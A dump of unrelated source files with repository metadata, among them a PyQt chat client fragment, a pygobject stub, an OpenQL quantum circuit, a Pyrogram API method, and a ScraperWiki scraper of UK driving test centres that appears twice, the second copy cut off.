self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
else:
self.database.save_message(self.current_chat, 'out', message_text)
client_logger.debug(
f'Отправлено сообщение для {self.current_chat}: {message_text}')
self.history_list_update()
# Слот приёма нового сообщений
@pyqtSlot(dict)
def message(self, message):
# Получаем строку байтов
encrypted_message = base64.b64decode(message[MESSAGE_TEXT])
# Декодируем строку, при ошибке выдаём сообщение и завершаем функцию
try:
decrypted_message = self.decrypter.decrypt(encrypted_message)
except (ValueError, TypeError):
self.messages.warning(
self, 'Ошибка', 'Не удалось декодировать сообщение.')
return
# Сохраняем сообщение в базу и обновляем историю сообщений или
# открываем новый чат.
self.database.save_message(
self.current_chat,
'in',
decrypted_message.decode('utf8'))
sender = message[SENDER]
if sender == self.current_chat:
self.history_list_update()
else:
# Проверим есть ли такой пользователь у нас в контактах:
if self.database.check_contact(sender):
# Если есть, спрашиваем и желании открыть с ним чат и открываем
# при желании
if self.messages.question(
self,
'Новое сообщение',
f'Получено новое сообщение от {sender}, открыть чат с ним?',
QMessageBox.Yes,
QMessageBox.No) == QMessageBox.Yes:
self.current_chat = sender
self.set_active_user()
else:
print('NO')
# Раз нету,спрашиваем хотим ли добавить юзера в контакты.
if self.messages.question(
self,
'Новое сообщение',
f'Получено новое сообщение от {sender}.\n Данного пользователя нет в вашем контакт-листе.\n Добавить в контакты и открыть чат с ним?',
QMessageBox.Yes,
QMessageBox.No) == QMessageBox.Yes:
self.add_contact(sender)
self.current_chat = sender
# Нужно заново сохранить сообщение, иначе оно будет потеряно,
# т.к. на момент предыдущего вызова контакта не было.
self.database.save_message(
self.current_chat, 'in', decrypted_message.decode('utf8'))
self.set_active_user()
# Слот потери соединения
# Выдаёт сообщение о ошибке и завершает работу приложения
@pyqtSlot()
def connection_lost(self):
self.messages.warning(
self,
'Сбой соединения',
'Потеряно соединение с сервером. ')
self.close()
# Слот сообщения 205 - требование сервером обновить справочники доступных пользователей и контактов
# Может получиться так, что удалён текущий собеседник, надо проверить это и закрыть чат с предупреждением.
# иначе просто обновить список контактов, без выдачи предупреждения
# пользователю.
@pyqtSlot()
def sig_205(self):
if self.current_chat and not self.database.check_user(
self.current_chat):
self.messages.warning(
self,
'Сочувствую',
'К сожалению собеседник был удалён с сервера.')
self.set_disabled_input()
self.current_chat = None
self.clients_list_update()
def make_connection(self, trans_obj):
trans_obj.new_message.connect(self.message)
trans_obj.connection_lost.connect(self.connection_lost)
trans_obj.message_205.connect(self.sig_205)
# Функция добавления аватара
def add_avat_user(self):
fname = QFileDialog.getOpenFileName(
self, 'Open file', '/home/picforavat')[0]
self.fname = fname
file = Image.open(self.fname)
width = 60
height = 50
# Изменяем размер изображения
our_pict = file.resize((width, height), Image.BICUBIC)
our_pict.save("avatar.jpg")
file = open("avatar.jpg", "rb")
our_pict = file.read()
file.close()
# Добавляем в БД
self.database.add_avatar(our_pict)
# Обрезаем изображение
file = Image.open("avatar.jpg")
our_pict = file.crop((0, 0, 50, 40))
our_pict.save("avatar.jpg")
# Меняем аватар в окне клиента на новый
pixmap = QPixmap('avatar.jpg')
self.ui.avatar.setPixmap(pixmap)
self.ui.avatar.resize(300, 300)
self.ui.avatar.setGeometry(QRect(300, 425, 45, 35))
file = open("avatar.jpg", "rb")
our_pict = file.read()
file.close()
# Добавляем в БД
self.database.add_avatar(our_pict)
def sel_avat_user(self):
print('ok')
def chat_history_update(self):
if self.history_model:
self.history_model.clear()
if not self.history_model:
self.history_model = QStandardItemModel()
self.ui.list_messages.setModel(self.history_model)
list_messages = self.transport.get_chat_message()
# Берём не более 20 последних записей.
length = len(list_messages)
start_index = 0
if length > 20:
start_index = length - 20
for i in range(start_index, length):
item = list_messages[i]
mess = QStandardItem(
f'Сообщение от {item[0]}:\n {item[1]}')
mess.setEditable(False)
#mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
self.ui.list_messages.scrollToBottom()
# Функция отправляет на сервер сообщение, которое направлено в чат
def create_message_for_chat(self):
self.chat_history_update()
# Текст в поле, проверяем что поле не пустое затем забирается сообщение
# и поле очищается
message_text = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
self.ui.label_new_message.setText(
f'Введите сообщенние в чат')
self.ui.text_message.setDisabled(False)
if not message_text:
return
try:
self.transport.send_message_to_chat(message_text)
# message_text_encrypted_base64.decode('ascii'))
pass
except ServerError as err:
self.messages.critical(self, 'Ошибка', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
except (ConnectionResetError, ConnectionAbortedError):
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
else:
self.chat_history_update()
# Функция поиска истории сообщений по имени пользователя
def search_mess_on_name(self):
usv = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
self.ui.text_message.setDisabled(False)
if not usv:
return
list_contacts = self.database.get_contacts()
if usv in list_contacts:
if self.history_model:
self.history_model.clear()
if not self.history_model:
self.history_model = QStandardItemModel()
self.ui.list_messages.setModel(self.history_model)
list_messages = self.database.get_history(usv)
length = len(list_messages)
start_index = 0
if length > 20:
start_index = length - 20
for i in range(start_index, length):
item = list_messages[i]
if item[1] == 'out':
mess = QStandardItem(
f'Я:\n Сообщение от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
# mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
elif item[1] == 'in':
mess = QStandardItem(
f'{usv}:\n Сообщение от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
# mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
self.ui.list_messages.scrollToBottom()
else:
if self.history_model:
self.history_model.clear()
mess = QStandardItem(
'Пользователя с таким именем у вас в контактах нет')
mess.setEditable(False)
mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
| [
"spoliv@rambler.ru"
] | spoliv@rambler.ru |
3d0cfb8549a4333779da65805f245c044c3a7739 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncai.py | 87e46160893ad96819ed62acdeb66ef9cf5cbad3 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 219 | py | ii = [('LyelCPG2.py', 1), ('MarrFDI.py', 1), ('LeakWTI2.py', 2), ('LeakWTI3.py', 5), ('PettTHE.py', 2), ('WilkJMC2.py', 1), ('GodwWLN.py', 1), ('LeakWTI.py', 2), ('BachARE.py', 1), ('MackCNH2.py', 1), ('SomeMMH.py', 1)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
8c9a9f741726da776b4308350bc36ee2122176dc | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/RygelServer/HTTPGetHandlerPrivate.py | abf284586181e910e051275ee24086b26ae3ec76 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,491 | py | # encoding: utf-8
# module gi.repository.RygelServer
# from /usr/lib64/girepository-1.0/RygelServer-2.6.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Gee as __gi_repository_Gee
import gi.repository.GUPnP as __gi_repository_GUPnP
import gi.repository.RygelCore as __gi_repository_RygelCore
import gobject as __gobject
class HTTPGetHandlerPrivate(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(HTTPGetHandlerPrivate), '__module__': 'gi.repository.RygelServer', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'HTTPGetHandlerPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'HTTPGetHandlerPrivate' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(HTTPGetHandlerPrivate)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
d035d1dae19cfea09c2da4df135bd31e7906ddb9 | a4bb0cde9697aa0c85375764d8353da0e1422525 | /mapping_features_fn.py | a369e667d81b360cd2deaeb73b8053108bdcc8fc | [] | no_license | JanzYe/KDD_CUP_2012_Track2 | 5dd529eb1ca0592ab2ea71bda9416a756fc3a0b5 | 027f4a6025814278c82f68da1cb19ef8f3fb1f1a | refs/heads/master | 2020-04-16T06:23:21.419074 | 2019-01-14T06:55:29 | 2019-01-14T06:55:29 | 165,344,529 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,440 | py | '''
This scripts should run on raw user feature files.
'''
# total number of records in training.txt is almost 150000000, exactly 149639105
# divide the training.txt to feature_mapped_train and feature_mapped_valid
# feature_mapped_train(120000000), feature_mapped_valid(30000000)
# data_descriptionid, data_purchasedkeywordid, data_queryid, data_titleid, gender, age are not need to mapping, because every records are distinct,
# and their id can consider as the value after mapping
# input = "/home/yezhizi/Documents/python/2018DM_Project/track2/training.txt"
# new_train = "data/feature_mapped_train.data"
# new_valid = "data/feature_mapped_valid.data"
input = "/home/yezhizi/Documents/python/2018DM_Project/track2/training_combined.txt"
mapped = "data/feature_mapped_combined_training.data"
# input = "/home/yezhizi/Documents/python/2018DM_Project/track2/test_combined.txt"
# mapped = "data/feature_mapped_combined_test.data"
# features_mapping = "data/features_mapping_fn.pkl"
features_mapping = "data/features_mapping_combined.pkl"
# number_of_training = 120000000
# number_of_training = 120000
import pickle as pkl
class Feature:
def __init__(self,name):
self.name = name
self.values = set()
self.mapping = None
with open(features_mapping,'rb') as f:
print('features mapping loading ... ')
features = pkl.load(f)
print('features mapping loaded')
feat_names = [
'DisplayURL',
'AdID',
'AdvertiserID',
'Depth',
'Position',
'QueryID',
'KeywordID',
'TitleID',
'DescriptionID',
'Gender',
'Age',
]
user_offsets = {}
offset = 0
with open(input) as fr, open(mapped, 'w') as fw:
for idx, line in enumerate(fr):
records = line.strip().split("\t")
# the 0, 1 are click and impression
ctr = 1.0 * int(records[0]) / int(records[1])
to_write = str(ctr)
for i in range(2, len(records)):
val = int(records[i])
keywords = feat_names[i-2]
if val not in features[keywords].mapping:
val = 0
values = [str(features[keywords].mapping[val])]
#record = keywords+" "+" ".join(values)
to_write = to_write + ',' + str(values[0])
to_write = to_write + "\n"
fw.write(to_write)
if (idx+1) % 200000 == 0:
print(idx+1)
print(to_write)
# break
fr.close()
fw.close()
| [
"1173865843@qq.com"
] | 1173865843@qq.com |
69ff0d97a85477dcd1228d5e42b4be7da7365da2 | 0e25dc15ae9efce8bfd716d4d2041da07767968b | /qbench/benchmarks/QLib/OPENQL_converted/benstein_vazirani_41b_secret_32.py | 245553254e73295a001dbe1eb9cb042f6d2efc45 | [] | no_license | alxhotel/crossbar-bench | f608fc0062b4f8a5162ec33d61c0204aaf27b6ff | 3bf7536e7697d29c3089b0ba564ba22d39698b88 | refs/heads/master | 2021-07-13T16:06:50.085838 | 2020-10-04T23:39:05 | 2020-10-04T23:39:05 | 213,409,122 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,090 | py | from openql import openql as ql
import os
import argparse
def circuit(config_file, new_scheduler='yes', scheduler='ASAP', uniform_sched= 'no', sched_commute = 'yes', mapper='base', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='test_output', optimize='no', measurement=True, log_level='LOG_WARNING'):
curdir = os.path.dirname(__file__)
output_dir = os.path.join(curdir, output_dir_name)
ql.set_option('output_dir', output_dir)
ql.set_option('optimize', optimize)
ql.set_option('scheduler', scheduler)
ql.set_option('scheduler_uniform', uniform_sched)
ql.set_option('mapper', mapper)
ql.set_option('initialplace', initial_placement)
ql.set_option('log_level', log_level)
ql.set_option('scheduler_post179', new_scheduler)
ql.set_option('scheduler_commute', sched_commute)
ql.set_option('mapusemoves', moves)
ql.set_option('maptiebreak', maptiebreak)
config_fn = os.path.join(curdir, config_file)
# platform = ql.Platform('platform_none', config_fn)
platform = ql.Platform('starmon', config_fn)
sweep_points = [1,2]
num_circuits = 1
num_qubits = 43
p = ql.Program('benstein_vazirani_41b_secret_32', platform, num_qubits)
p.set_sweep_points(sweep_points, num_circuits)
k = ql.Kernel('benstein_vazirani_41b_secret_32', platform, num_qubits)
k.gate('prepz',[41])
k.gate('x',[41])
k.gate('h',[0])
k.gate('h',[1])
k.gate('h',[2])
k.gate('h',[3])
k.gate('h',[4])
k.gate('h',[5])
k.gate('h',[6])
k.gate('h',[7])
k.gate('h',[8])
k.gate('h',[9])
k.gate('h',[10])
k.gate('h',[11])
k.gate('h',[12])
k.gate('h',[13])
k.gate('h',[14])
k.gate('h',[15])
k.gate('h',[16])
k.gate('h',[17])
k.gate('h',[18])
k.gate('h',[19])
k.gate('h',[20])
k.gate('h',[21])
k.gate('h',[22])
k.gate('h',[23])
k.gate('h',[24])
k.gate('h',[25])
k.gate('h',[26])
k.gate('h',[27])
k.gate('h',[28])
k.gate('h',[29])
k.gate('h',[30])
k.gate('h',[31])
k.gate('h',[32])
k.gate('h',[33])
k.gate('h',[34])
k.gate('h',[35])
k.gate('h',[36])
k.gate('h',[37])
k.gate('h',[38])
k.gate('h',[39])
k.gate('h',[40])
k.gate('h',[41])
k.gate('cnot',[5,41])
k.gate('h',[0])
k.gate('h',[1])
k.gate('h',[2])
k.gate('h',[3])
k.gate('h',[4])
k.gate('h',[5])
k.gate('h',[6])
k.gate('h',[7])
k.gate('h',[8])
k.gate('h',[9])
k.gate('h',[10])
k.gate('h',[11])
k.gate('h',[12])
k.gate('h',[13])
k.gate('h',[14])
k.gate('h',[15])
k.gate('h',[16])
k.gate('h',[17])
k.gate('h',[18])
k.gate('h',[19])
k.gate('h',[20])
k.gate('h',[21])
k.gate('h',[22])
k.gate('h',[23])
k.gate('h',[24])
k.gate('h',[25])
k.gate('h',[26])
k.gate('h',[27])
k.gate('h',[28])
k.gate('h',[29])
k.gate('h',[30])
k.gate('h',[31])
k.gate('h',[32])
k.gate('h',[33])
k.gate('h',[34])
k.gate('h',[35])
k.gate('h',[36])
k.gate('h',[37])
k.gate('h',[38])
k.gate('h',[39])
k.gate('h',[40])
k.gate('h',[41])
if measurement:
for q in range(num_qubits):
k.gate('measure', [q])
p.add_kernel(k)
p.compile()
ql.set_option('mapper', 'no')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
parser.add_argument('config_file', help='Path to the OpenQL configuration file to compile this algorithm')
parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform shceduler actication (yes or no)')
parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
parser.add_argument('--mapper', nargs='?', default='base', help='Mapper specification (base, minextend, minextendrc)')
parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
parser.add_argument('--out_dir', nargs='?', default='test_output', help='Folder name to store the compilation')
parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
args = parser.parse_args()
try:
circuit(args.config_file, args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
except TypeError:
print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
raise | [
"alxmorais8@msn.com"
] | alxmorais8@msn.com |
5871936defe13c8c76a1e5180211aed6b730fb84 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02939/s874669540.py | a4a0e29c427f34abd6e8938f8a85118db21cf80c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | s = str(input())
S = []
temp = ''
for c in s:
temp += c
if S:
if S[-1] != temp:
S.append(temp)
temp = ''
else:
S.append(temp)
temp = ''
print(len(S))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
50413ba7b2f7b0d8c96b23ca8c6e6550f4a489e3 | 259453140d6b563fc0c280f0922601a54a2cb2c2 | /CMGTools/Production/scripts/dataset.py | 1f44ad56b3e945725420679cfd494be56a9a079b | [] | no_license | wangmengmeng/WHAnalysisPackage | f56b4a128f50801409828ca38d0f26e199201dd8 | 7eb1bf3b4e77579c4362396ca5e594bc93a41f2b | refs/heads/master | 2021-01-17T14:31:11.701436 | 2014-06-05T16:07:38 | 2014-06-05T16:07:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,653 | py | #!/usr/bin/env python
import os
import fnmatch
from CMGTools.Production.dataset import createDataset
if __name__ == '__main__':
import sys
from optparse import OptionParser
import pprint
parser = OptionParser()
parser.usage = "%prog [options] <dataset>\nPrints information on a sample."
parser.add_option("-w", "--wildcard", dest="wildcard", default='tree*root',help='A UNIX style wilfcard for root file printout')
parser.add_option("-u", "--user", dest="user", default=os.environ.get('USER', None),help='user owning the dataset.\nInstead of the username, give "LOCAL" to read datasets in a standard unix filesystem, and "CMS" to read official CMS datasets present at CERN.')
parser.add_option("-b", "--basedir", dest="basedir", default=os.environ.get('CMGLOCALBASEDIR',None),help='in case -u LOCAL is specified, this option allows to specify the local base directory containing the dataset. default is CMGLOCALBASEDIR')
parser.add_option("-a", "--abspath", dest="abspath",
action = 'store_true',
default=False,
help='print absolute path')
parser.add_option("-n", "--noinfo", dest="noinfo",
action = 'store_true',
default=False,
help='do not print additional info (file size and status)')
parser.add_option("-r", "--report", dest="report",
action = 'store_true',
default=False,
help='Print edmIntegrityCheck report')
parser.add_option("-c", "--readcache", dest="readcache",
action = 'store_true',
default=False,
help='Read from the cache.')
parser.add_option("--min-run", dest="min_run", default=-1, type=int, help='When querying DBS, require runs >= than this run')
parser.add_option("--max-run", dest="max_run", default=-1, type=int, help='When querying DBS, require runs <= than this run')
(options,args) = parser.parse_args()
if len(args)!=1:
parser.print_help()
sys.exit(1)
user = options.user
name = args[0]
info = not options.noinfo
run_range = (options.min_run,options.max_run)
data = createDataset(user, name,
fnmatch.translate( options.wildcard ),
options.readcache,
options.basedir,
run_range=run_range)
data.printInfo()
data.printFiles(abspath = options.abspath,
info = info)
if options.report:
pprint.pprint( data.report )
| [
"mengmeng.wang@cern.ch"
] | mengmeng.wang@cern.ch |
69dbcf71f1bbf8f6d7c05e580c0952e58ee38dca | 8760766a314dc1cb126b235cd2528fd39963a5bf | /database_ui/venv/Lib/site-packages/pyrogram/raw/functions/stats/get_megagroup_stats.py | 5e001bdde3d2ddacb375aef3400530946f88538d | [] | no_license | sunliangjun/database_demo | bb3eeaf0523e35f1b5c2c4d80ee68197f6e60715 | f7a1edc9a0eb9ce56ec76c5be67bbcbd66e45666 | refs/heads/main | 2023-01-02T19:43:16.874831 | 2020-10-22T13:06:20 | 2020-10-22T13:13:10 | 306,046,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetMegagroupStats(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0xdcdf8607``
Parameters:
channel: :obj:`InputChannel <pyrogram.raw.base.InputChannel>`
dark (optional): ``bool``
Returns:
:obj:`stats.MegagroupStats <pyrogram.raw.base.stats.MegagroupStats>`
"""
__slots__: List[str] = ["channel", "dark"]
ID = 0xdcdf8607
QUALNAME = "functions.stats.GetMegagroupStats"
def __init__(self, *, channel: "raw.base.InputChannel", dark: Union[None, bool] = None) -> None:
self.channel = channel # InputChannel
self.dark = dark # flags.0?true
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetMegagroupStats":
flags = Int.read(data)
dark = True if flags & (1 << 0) else False
channel = TLObject.read(data)
return GetMegagroupStats(channel=channel, dark=dark)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
flags = 0
flags |= (1 << 0) if self.dark is not None else 0
data.write(Int(flags))
data.write(self.channel.write())
return data.getvalue()
| [
"582675682@qq.com"
] | 582675682@qq.com |
5af08f0235d4499b872253caf77b8dd5584d4afe | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/A/alphagov/uk_dvla_practical_test_centres_1.py | 05a90b7771facbdbc2cd97a7e16b55bc915f0fad | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,646 | py | # http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?Cat=-1&TestType=car&TypeID=17
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?letter=G&CAT=-1&s=&TypeID=17&TestType=car
import scraperwiki
import re
import time
from BeautifulSoup import BeautifulSoup, Tag
def a_to_z(url):
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
for letter in letters:
yield url % letter
def absolute(url):
return "http://www.dft.gov.uk/dsa/%s" % url
index_urls = a_to_z(absolute("AtoZservices_Bannered.asp?letter=%s&CAT=-1&s=&TypeID=17&TestType="))
def first(gen):
for a in gen:
yield a
return
def all(gen):
for a in gen:
yield a
def scrape(url):
html = scraperwiki.scrape(url)
time.sleep(2)
return html
process = all
def soup_strip_html_preserve_brs(st):
if st is None:
return ''
def munge(e):
if isinstance(e,unicode):
return e.strip()
elif isinstance(e,Tag) and e.name == "br":
return "\n"
else:
return ""
return ''.join([ munge(e) for e in st.recursiveChildGenerator()]).replace(" "," ").strip("\n").strip()
center_urls = set()
for url in process(index_urls):
html = scrape(url)
soup = BeautifulSoup(html)
links = soup.findAll('a',attrs = {"href": re.compile("^AddressDetails_Bannered.asp")})
for link in links:
url = link["href"]
name = link.text
center_urls.add((url,name))
for url,p_title in process(center_urls):
html = scrape(absolute(url))
soup = BeautifulSoup(html)
title = soup.find('h3')
if title.text <> "":
addressNode = title.findNextSibling("p")
center_name = title.text
address = soup_strip_html_preserve_brs(addressNode)
postcode = address.split("\n")[-1]
def has_details_node():
next_h3 = addressNode.findNextSibling("h3")
if next_h3 is None:
return None
elif next_h3.text == "":
return None
else:
return next_h3
def is_test_type(line):
return ":" in line and line.split(":")[0] in ["Car","Motorcycle Module 2","Motorcycle Module 1","Taxi","Vocational"]
if has_details_node():
detailsNode = addressNode.findNextSibling("p")
additional_details = soup_strip_html_preserve_brs(detailsNode)
testsNode = detailsNode.findNextSibling("p").findNextSibling("p")
else:
additional_details = ""
testsNode = addressNode.findNextSibling("p").findNextSibling("p")
if addressNode.findNextSibling("strong"):
additional_details = None
startNode = addressNode
test_types = []
while True:
testNode = startNode.findNextSibling("strong")
if testNode is None:
break
test = testNode.text.strip(" :")
details = testNode.nextSibling.replace(" "," ").replace(": ","").strip()
test_types.append([test,details])
startNode = testNode.nextSibling
else:
tests = soup_strip_html_preserve_brs(testsNode)
test_types = [line.split(":") for line in tests.split("\n") if is_test_type(line)]
data = {
"url": url,
"title": p_title,
"center_name": center_name,
"address": address,
"postcode": postcode,
"additional_details": additional_details,
"on_offer": ",".join([t[0] for t in test_types])
}
for t in test_types:
data[t[0].lower()+"_avail"] = t[1]
scraperwiki.datastore.save(unique_keys=['url'], data= data)
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?Cat=-1&TestType=car&TypeID=17
# http://www.dft.gov.uk/dsa/AtoZservices_Bannered.asp?letter=G&CAT=-1&s=&TypeID=17&TestType=car
import scraperwiki
import re
import time
from BeautifulSoup import BeautifulSoup, Tag
def a_to_z(url):
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
for letter in letters:
yield url % letter
def absolute(url):
return "http://www.dft.gov.uk/dsa/%s" % url
index_urls = a_to_z(absolute("AtoZservices_Bannered.asp?letter=%s&CAT=-1&s=&TypeID=17&TestType="))
def first(gen):
for a in gen:
yield a
return
def all(gen):
for a in gen:
yield a
def scrape(url):
html = scraperwiki.scrape(url)
time.sleep(2)
return html
process = all
def soup_strip_html_preserve_brs(st):
if st is None:
return ''
def munge(e):
if isinstance(e,unicode):
return e.strip()
elif isinstance(e,Tag) and e.name == "br":
return "\n"
else:
return ""
return ''.join([ munge(e) for e in st.recursiveChildGenerator()]).replace(" "," ").strip("\n").strip()
center_urls = set()
for url in process(index_urls):
html = scrape(url)
soup = BeautifulSoup(html)
links = soup.findAll('a',attrs = {"href": re.compile("^AddressDetails_Bannered.asp")})
for link in links:
url = link["href"]
name = link.text
center_urls.add((url,name))
for url,p_title in process(center_urls):
html = scrape(absolute(url))
soup = BeautifulSoup(html)
title = soup.find('h3')
if title.text <> "":
addressNode = title.findNextSibling("p")
center_name = title.text
address = soup_strip_html_preserve_brs(addressNode)
postcode = address.split("\n")[-1]
def has_details_node():
next_h3 = addressNode.findNextSibling("h3")
if next_h3 is None:
return None
elif next_h3.text == "":
return None
else:
return next_h3
def is_test_type(line):
return ":" in line and line.split(":")[0] in ["Car","Motorcycle Module 2","Motorcycle Module 1","Taxi","Vocational"]
if has_details_node():
detailsNode = addressNode.findNextSibling("p")
additional_details = soup_strip_html_preserve_brs(detailsNode)
testsNode = detailsNode.findNextSibling("p").findNextSibling("p")
